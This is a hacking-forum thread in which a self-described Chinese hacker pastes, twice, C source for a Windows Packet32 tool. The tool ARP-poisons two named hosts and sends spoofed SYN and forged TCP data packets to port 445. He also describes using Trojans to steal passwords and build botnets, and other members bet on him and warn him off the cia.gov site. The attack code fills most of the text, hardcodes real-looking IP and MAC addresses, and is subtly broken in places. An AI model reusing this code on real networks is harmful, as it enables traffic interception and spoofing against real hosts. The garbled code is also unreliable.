I bet <u>$8.00</u> he won't return.floodhound2 wrote:I bet $5.oo he will not return. Any takers?
a Chinese hacker
I bet $10.oo ...^So many messages ah! To explain my technique frist...
HERE This is a picture....
Prior said, and I have come to conduct exchanges, not for the quarrel.
2000.5 do you know ??? I have come to promote peace
If you like to discuss these,you can go to http://www.cia.gov/
Cheers!!!
HERE This is a picture....
Prior said, and I have come to conduct exchanges, not for the quarrel.
2000.5 do you know ??? I have come to promote peace
If you like to discuss these,you can go to http://www.cia.gov/
Cheers!!!
#include "stdafx.h"
#include "winsock2.h"
#include "Packet32.h"
#include "stdio.h"
#pragma comment(lib, "packet"
#pragma comment(lib, "ws2_32"
#define SIMULATE_MAC "0011111d735a"
#define TARGET_MAC "001111c6f7fe"
#define LOCAL_MAC "00e06e41508f"
#define TARGET_IP "211.83.97.24"
#define SIMULATE_IP "211.83.97.16"
#define NDIS_PACKET_TYPE_DIRECTED 0x0001
#pragma pack(push, 1)
struct ET_HEADER
{
unsigned char eh_dst[6];
unsigned char eh_src[6];
unsigned short eh_type;
};
struct ARP_HEADER
{
unsigned short arp_hdr;
unsigned short arp_pro;
unsigned char arp_hln;
unsigned char arp_pln;
unsigned short arp_opt;
unsigned char arp_sha[6];
unsigned long arp_spa;
unsigned char arp_tha[6];
unsigned long arp_tpa;
};
struct IP_HEADER
{
char m_ver_hlen;
char m_tos;
USHORT m_tlen;
USHORT m_ident;
USHORT m_flag_frag;
char m_ttl;
char m_protocol;
USHORT m_cksum;
ULONG m_sIP;
ULONG m_dIP;
};
struct TCP_HEADER
{
USHORT m_sport;
USHORT m_dport;
ULONG m_seq;
ULONG m_ack;
char m_hlen_res4;
char m_res2_flag;
USHORT m_win;
USHORT m_cksum;
USHORT m_urp;
};
struct PSD_HEADER
{
ULONG m_saddr;
ULONG m_daddr;
char m_mbz;
char m_ptcl;
USHORT m_tcpl;
};
struct TCP_OPTION
{
USHORT unKnown;
USHORT maxSegSize;
char no1;
char no2;
USHORT SACK;
};
struct CHEAT_ARP_INFO
{
char simulateIP[20];
char targetIP[20];
char targetMAC[13];
};
#pragma pack(pop)
USHORT CheckSum(USHORT *buffer, int size);
void StrToMac(char *str,char *mac);
void ListenACK();
void AssayAndSendData(LPPACKET lpPacket);
DWORD WINAPI ArpCheat(void *pInfo);
DWORD WINAPI SendSyn(void *no);
void Info();
LPADAPTER lpAdapter=NULL;
USHORT ipID=1638;
USHORT sourcePort=1056;
USHORT targetPort=445;
int main(int argc, char* argv[])
{
Info();
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
{
printf("WSAStartup error!\n");
return -1;
}
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
while((*name1!='\0'|| (*(name1-1)!='\0'))
{
if(*name1=='\0'
{
memcpy(adapter_list,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
CHEAT_ARP_INFO info1={0},info2={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
Sleep(50);
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK();
PacketCloseAdapter(lpAdapter);
::WSACleanup();
return 0;
}
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE)
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
//填充TCP头部以及TCP选项:
tcp_header.m_dport=htons(targetPort);
tcp_header.m_sport=htons(sourcePort++);
tcp_header.m_seq=::GetTickCount();
tcp_header.m_ack=0;
tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
tcp_header.m_res2_flag=2;
tcp_header.m_win=htons(16384);
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
tcp_option.unKnown=htons(516);
tcp_option.maxSegSize=htons(1460);
tcp_option.no1=1;
tcp_option.no2=1;
tcp_option.SACK=htons(1026);
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
continue;
}
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
continue;
}
PacketFreePacket(lpPacket);
Sleep(100);
}
return 0;
}
DWORD WINAPI ArpCheat(void *pInfo)
{
CHEAT_ARP_INFO info={0};
memcpy(&info,pInfo,sizeof(CHEAT_ARP_INFO));
char s_mac[6]={0},d_mac[6]={0};
ET_HEADER et_header={0};
ARP_HEADER arp_header={0};
char buffer[64]={0};
StrToMac(LOCAL_MAC,s_mac);
memcpy(et_header.eh_src,s_mac,6);
StrToMac(info.targetMAC,d_mac);
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0806);
arp_header.arp_hdr=htons(0x0001);
arp_header.arp_pro=htons(0x0800);
arp_header.arp_hln=6;
arp_header.arp_pln=4;
arp_header.arp_opt=htons(0x0002);
arp_header.arp_spa=inet_addr(info.simulateIP); //source_ip
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(info.targetIP); //target_ip
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,buffer,64);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
printf("warning: Unable to send more than one packet in a single write!\n");
while(TRUE)
{
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
break;
}
Sleep(3000);
}
PacketFreePacket(lpPacket);
return 0;
}
void ListenACK()
{
LPPACKET lpPacket;
char recvBuf[512]={0};
PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_DIRECTED);
PacketSetBuff(lpAdapter,1024);
PacketSetReadTimeout(lpAdapter,2);
while(TRUE)
{
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,recvBuf,512);
if(PacketReceivePacket(lpAdapter,lpPacket,TRUE)==TRUE)
AssayAndSendData(lpPacket);
else
printf("Recv Error!\n");
PacketFreePacket(lpPacket);
memset(recvBuf,0,512);
Sleep(10);
}
PacketFreePacket(lpPacket);
return;
}
USHORT CheckSum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
cksum += *(UCHAR*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void StrToMac(char *str,char *mac)
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
str1=str+1;
switch(*str)
{
case 'a':high=10;
break;
case 'b':high=11;
break;
case 'c':high=12;
break;
case 'd':high=13;
break;
case 'e':high=14;
break;
case 'f':high=15;
break;
default:temp=*str;
high=atoi(&temp);
}
switch(*str1)
{
case 'a':low=10;
break;
case 'b':low=11;
break;
case 'c':low=12;
break;
case 'd':low=13;
break;
case 'e':low=14;
break;
case 'f':low=15;
break;
default:temp=*str1;
low=atoi(&temp);
}
mac=high*16+low;
str+=2;
}
}
void AssayAndSendData(LPPACKET lpPacket)
{
char *buf;
bpf_hdr *lpBpfhdr;
ET_HEADER *lpEthdr;
in_addr addr={0};
buf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)buf;
lpEthdr=(ET_HEADER *)(buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800))
{
IP_HEADER *lpIphdr=(IP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER));
if( ( inet_addr(SIMULATE_IP)==lpIphdr->m_dIP ) && ( inet_addr(TARGET_IP)==lpIphdr->m_sIP ) && (lpIphdr->m_protocol==IPPROTO_TCP) )
{
TCP_HEADER *lpTcphdr=(TCP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER)+sizeof(IP_HEADER));
if( ( (lpTcphdr->m_res2_flag & 0x10)!=0 ) && ( lpTcphdr->m_win!=0 ) )
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
char *data="ffantasyYD";
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+strlen(data));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
tcp_header.m_dport=lpTcphdr->m_sport;
tcp_header.m_sport=lpTcphdr->m_dport;
tcp_header.m_seq=lpTcphdr->m_ack;
if(lpTcphdr->m_res2_flag==0x12)
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+1);
else
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+ntohs(lpIphdr->m_tlen)-40);
tcp_header.m_hlen_res4=((sizeof(TCP_HEADER)/4)<<4);
tcp_header.m_res2_flag=0x10;
tcp_header.m_win=lpTcphdr->m_win;
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+strlen(data));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+strlen(data));
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
:
LPPACKET lpSendPacket;
lpSendPacket=PacketAllocatePacket();
PacketInitPacket(lpSendPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
return;
}
if(PacketSendPacket(lpAdapter,lpSendPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return;
}
PacketFreePacket(lpSendPacket);
}
}
}
return;
}
#include "winsock2.h"
#include "Packet32.h"
#include "stdio.h"
#pragma comment(lib, "packet"
#pragma comment(lib, "ws2_32"
#define SIMULATE_MAC "0011111d735a"
#define TARGET_MAC "001111c6f7fe"
#define LOCAL_MAC "00e06e41508f"
#define TARGET_IP "211.83.97.24"
#define SIMULATE_IP "211.83.97.16"
#define NDIS_PACKET_TYPE_DIRECTED 0x0001
#pragma pack(push, 1)
struct ET_HEADER
{
unsigned char eh_dst[6];
unsigned char eh_src[6];
unsigned short eh_type;
};
struct ARP_HEADER
{
unsigned short arp_hdr;
unsigned short arp_pro;
unsigned char arp_hln;
unsigned char arp_pln;
unsigned short arp_opt;
unsigned char arp_sha[6];
unsigned long arp_spa;
unsigned char arp_tha[6];
unsigned long arp_tpa;
};
struct IP_HEADER
{
char m_ver_hlen;
char m_tos;
USHORT m_tlen;
USHORT m_ident;
USHORT m_flag_frag;
char m_ttl;
char m_protocol;
USHORT m_cksum;
ULONG m_sIP;
ULONG m_dIP;
};
struct TCP_HEADER
{
USHORT m_sport;
USHORT m_dport;
ULONG m_seq;
ULONG m_ack;
char m_hlen_res4;
char m_res2_flag;
USHORT m_win;
USHORT m_cksum;
USHORT m_urp;
};
struct PSD_HEADER
{
ULONG m_saddr;
ULONG m_daddr;
char m_mbz;
char m_ptcl;
USHORT m_tcpl;
};
struct TCP_OPTION
{
USHORT unKnown;
USHORT maxSegSize;
char no1;
char no2;
USHORT SACK;
};
struct CHEAT_ARP_INFO
{
char simulateIP[20];
char targetIP[20];
char targetMAC[13];
};
#pragma pack(pop)
USHORT CheckSum(USHORT *buffer, int size);
void StrToMac(char *str,char *mac);
void ListenACK();
void AssayAndSendData(LPPACKET lpPacket);
DWORD WINAPI ArpCheat(void *pInfo);
DWORD WINAPI SendSyn(void *no);
void Info();
LPADAPTER lpAdapter=NULL;
USHORT ipID=1638;
USHORT sourcePort=1056;
USHORT targetPort=445;
int main(int argc, char* argv[])
{
Info();
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
{
printf("WSAStartup error!\n");
return -1;
}
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
while((*name1!='\0'|| (*(name1-1)!='\0'))
{
if(*name1=='\0'
{
memcpy(adapter_list,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
CHEAT_ARP_INFO info1={0},info2={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
Sleep(50);
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK();
PacketCloseAdapter(lpAdapter);
::WSACleanup();
return 0;
}
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE)
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
//填充TCP头部以及TCP选项:
tcp_header.m_dport=htons(targetPort);
tcp_header.m_sport=htons(sourcePort++);
tcp_header.m_seq=::GetTickCount();
tcp_header.m_ack=0;
tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
tcp_header.m_res2_flag=2;
tcp_header.m_win=htons(16384);
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
tcp_option.unKnown=htons(516);
tcp_option.maxSegSize=htons(1460);
tcp_option.no1=1;
tcp_option.no2=1;
tcp_option.SACK=htons(1026);
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
continue;
}
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
continue;
}
PacketFreePacket(lpPacket);
Sleep(100);
}
return 0;
}
DWORD WINAPI ArpCheat(void *pInfo)
{
CHEAT_ARP_INFO info={0};
memcpy(&info,pInfo,sizeof(CHEAT_ARP_INFO));
char s_mac[6]={0},d_mac[6]={0};
ET_HEADER et_header={0};
ARP_HEADER arp_header={0};
char buffer[64]={0};
StrToMac(LOCAL_MAC,s_mac);
memcpy(et_header.eh_src,s_mac,6);
StrToMac(info.targetMAC,d_mac);
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0806);
arp_header.arp_hdr=htons(0x0001);
arp_header.arp_pro=htons(0x0800);
arp_header.arp_hln=6;
arp_header.arp_pln=4;
arp_header.arp_opt=htons(0x0002);
arp_header.arp_spa=inet_addr(info.simulateIP); //source_ip
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(info.targetIP); //target_ip
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,buffer,64);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
printf("warning: Unable to send more than one packet in a single write!\n");
while(TRUE)
{
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
break;
}
Sleep(3000);
}
PacketFreePacket(lpPacket);
return 0;
}
void ListenACK()
{
LPPACKET lpPacket;
char recvBuf[512]={0};
PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_DIRECTED);
PacketSetBuff(lpAdapter,1024);
PacketSetReadTimeout(lpAdapter,2);
while(TRUE)
{
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,recvBuf,512);
if(PacketReceivePacket(lpAdapter,lpPacket,TRUE)==TRUE)
AssayAndSendData(lpPacket);
else
printf("Recv Error!\n");
PacketFreePacket(lpPacket);
memset(recvBuf,0,512);
Sleep(10);
}
PacketFreePacket(lpPacket);
return;
}
USHORT CheckSum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
cksum += *(UCHAR*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
void StrToMac(char *str,char *mac)
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
str1=str+1;
switch(*str)
{
case 'a':high=10;
break;
case 'b':high=11;
break;
case 'c':high=12;
break;
case 'd':high=13;
break;
case 'e':high=14;
break;
case 'f':high=15;
break;
default:temp=*str;
high=atoi(&temp);
}
switch(*str1)
{
case 'a':low=10;
break;
case 'b':low=11;
break;
case 'c':low=12;
break;
case 'd':low=13;
break;
case 'e':low=14;
break;
case 'f':low=15;
break;
default:temp=*str1;
low=atoi(&temp);
}
mac=high*16+low;
str+=2;
}
}
void AssayAndSendData(LPPACKET lpPacket)
{
char *buf;
bpf_hdr *lpBpfhdr;
ET_HEADER *lpEthdr;
in_addr addr={0};
buf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)buf;
lpEthdr=(ET_HEADER *)(buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800))
{
IP_HEADER *lpIphdr=(IP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER));
if( ( inet_addr(SIMULATE_IP)==lpIphdr->m_dIP ) && ( inet_addr(TARGET_IP)==lpIphdr->m_sIP ) && (lpIphdr->m_protocol==IPPROTO_TCP) )
{
TCP_HEADER *lpTcphdr=(TCP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER)+sizeof(IP_HEADER));
if( ( (lpTcphdr->m_res2_flag & 0x10)!=0 ) && ( lpTcphdr->m_win!=0 ) )
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
char *data="ffantasyYD";
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+strlen(data));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
tcp_header.m_dport=lpTcphdr->m_sport;
tcp_header.m_sport=lpTcphdr->m_dport;
tcp_header.m_seq=lpTcphdr->m_ack;
if(lpTcphdr->m_res2_flag==0x12)
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+1);
else
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+ntohs(lpIphdr->m_tlen)-40);
tcp_header.m_hlen_res4=((sizeof(TCP_HEADER)/4)<<4);
tcp_header.m_res2_flag=0x10;
tcp_header.m_win=lpTcphdr->m_win;
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+strlen(data));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+strlen(data));
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
:
LPPACKET lpSendPacket;
lpSendPacket=PacketAllocatePacket();
PacketInitPacket(lpSendPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
return;
}
if(PacketSendPacket(lpAdapter,lpSendPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return;
}
PacketFreePacket(lpSendPacket);
}
}
}
return;
}
-
Lyecdevf
- cyber Idi Amin
- Posts: 1222
- Joined: 16 Mar 2006, 17:00
- 18
- Location: In between life and death.
- Contact:
caisher wrote:Here, I have to admit that hackers in China, the technology can often break certain extent,
So you talking about software or hardware?caisher wrote: the purpose of my coming here is to find a technology can further enhance their own path.
You mean the the Chinese hackers?We will either find a way, or make one.
- Hannibal
- Hannibal
chinese food
I agree, lay off the cia.gov website. This forum is not going to teach how to break in to specific websites. We don't need any problems dragged in by a new member.
Thanks for the cia screenshot, I use it for my desktop now
You are still welcome as far as I am concerned, try to be more specific on what you need.
DNR
Thanks for the cia screenshot, I use it for my desktop now
You are still welcome as far as I am concerned, try to be more specific on what you need.
DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
Regarding China's hackers,most of us learn hacking technology to livelihoods.After the invasion of a web site, we will only leave virus.
This is because most of our people will take into account the interests
of this.Since the emergence of rootkit,this marks the advent of an era,
it is called "gray doves" era.Generally we use Trojan control other people's computers, will be to steal some password, or set up a zombie network.This is because this business has a lot of money results,most of us hackers to stay in the technical rootkit stage, will never be able to improve.I came here, and here is trying to bring advanced technology to China . My English is not very good, it is impossible to explain too much.
I hope you will support...^ We should know that our technology is far behind you..
This is because most of our people will take into account the interests
of this.Since the emergence of rootkit,this marks the advent of an era,
